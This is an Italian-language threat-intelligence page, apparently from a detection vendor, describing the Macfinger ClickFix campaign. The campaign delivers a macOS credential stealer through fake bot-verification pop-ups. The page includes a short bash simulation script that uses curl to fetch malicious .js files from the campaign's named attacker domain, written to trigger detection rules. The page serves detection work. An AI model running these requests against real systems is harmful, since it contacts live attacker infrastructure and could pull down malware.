SOC Prime Bias: High

24 Sep 2026 06:40 UTC

Campagna Macfinger ClickFix

Author Photo
SOC Prime Team linkedin icon Segui
Campagna Macfinger ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

Una nuova campagna di ingegneria sociale tracciata come Macfinger ClickFix prende di mira utenti macOS iniettando script dannosi in siti web legittimi. L’attacco presenta pagine di protezione bot false che ingannano le vittime facendole eseguire comandi che scaricano malware specifico per macOS. Il payload sembra essere una variante del ladro macOS Atomic (AMOS) progettato per rubare credenziali e altre informazioni dell’utente.

Indagine

L’indagine ha identificato siti web legittimi compromessi con script iniettati che mostrano pop-up di verifica falsi. L’analisi del traffico di rete ha rivelato un dominio dedicato utilizzato per il tracciamento degli utenti, insieme a diversi indirizzi IP che supportano la consegna di malware e le comunicazioni di Comando e Controllo (C2). I modelli di traffico osservati indicano esfiltrazione di credenziali e informazioni di sistema tramite richieste HTTP POST.

Mitigazione

Gli utenti dovrebbero essere addestrati a evitare di seguire istruzioni presentate da pop-up del browser inaspettati o pagine di verifica bot false. Le organizzazioni dovrebbero implementare il filtraggio web per bloccare domini e indirizzi IP noti come dannosi associati alle campagne ClickFix. Si raccomanda anche di monitorare connessioni in uscita insolite verso indirizzi IP non attendibili su porte non standard.

Risposta

Se viene rilevata un’attività di Macfinger ClickFix, gli host macOS interessati dovrebbero essere isolati immediatamente per fermare ulteriore esfiltrazione di dati. I responsabili dovrebbero eseguire un’indagine forense completa per determinare l’entità del compromesso delle credenziali. Le credenziali potenzialmente esposte dovrebbero essere reimpostate e i sistemi dovrebbero essere controllati per individuare meccanismi di persistenza come script shell non autorizzati o binari Mach-O.

Flusso di attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Possibile tentativo di comunicazione di ricerca dominio IP (via dns)

Team di SOC Prime
23 Set 2026

Comando e controllo sospetto tramite richiesta DNS di dominio di primo livello insolito (TLD) (via dns)

Team di SOC Prime
23 Set 2026

Possibile tentativo di enumerazione System_profiler (via process_creation)

Team di SOC Prime
23 Set 2026

Possibile manipolazione di stringhe codificate Base64 [MacOS] (via cmdline)

Team di SOC Prime
23 Set 2026

Tentativo di esecuzione Curl sospetto [MacOS] (via cmdline)

Team di SOC Prime
23 Set 2026

Indicatori di compromissione (HashSha256) per rilevare: campagna Macfinger ClickFix

Regole AI di SOC Prime
23 Set 2026

Indicatori di compromissione (SourceIP) per rilevare: campagna Macfinger ClickFix

Regole AI di SOC Prime
23 Set 2026

Indicatori di compromissione (DestinationIP) per rilevare: campagna Macfinger ClickFix

Regole AI di SOC Prime
23 Set 2026

Rileva traffico di campagna Macfinger ClickFix [Firewall]

Regole AI di SOC Prime
23 Set 2026

Rileva l’iniezione di script Macfinger ClickFix [Webserver]

Regole AI di SOC Prime
23 Set 2026

Esecuzione della simulazione

  • Narrativa dell’attacco e comandi: Un avversario utilizza una tecnica di ingegneria sociale conosciuta come “ClickFix,” dove un utente è invitato a cliccare su un pulsante (spesso un falso “fix” o “update”) che esegue uno script dannoso. In questa simulazione, imitiamo la fase finale: il browser/agente lato client che fa una richiesta al dominio controllato da Macfinger velvet-otter-glagceis.life per recuperare un .js file dannoso. Questa richiesta è progettata per corrispondere a uno dei tre criteri di selezione specifici nella logica di rilevamento.

  • Script di test di regressione:

    #!/bin/bash
    # Script di simulazione per attivare la regola di rilevamento Macfinger ClickFix
    
    echo "[*] Avvio simulazione Macfinger ClickFix..."
    
    # Obiettivo 1: selezione1 (parametro sito)
    echo "[*] Simulazione richiesta a selezione1..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload"
    
    # Obiettivo 2: selezione2 (file hash specifico)
    echo "[*] Simulazione richiesta a selezione2..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js"
    
    # Obiettivo 3: selezione3 (file ext-b)
    echo "[*] Simulazione richiesta a selezione3..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js"
    
    echo "[+] Simulazione completata. Controllare il SIEM per gli allarmi."
  • Comandi di ripristino:

    # Nessuna pulizia locale richiesta poiché si tratta di richieste di rete in uscita.
    # Se sono stati creati file locali, rimuoverli:
    rm -f /tmp/macfinger_test_*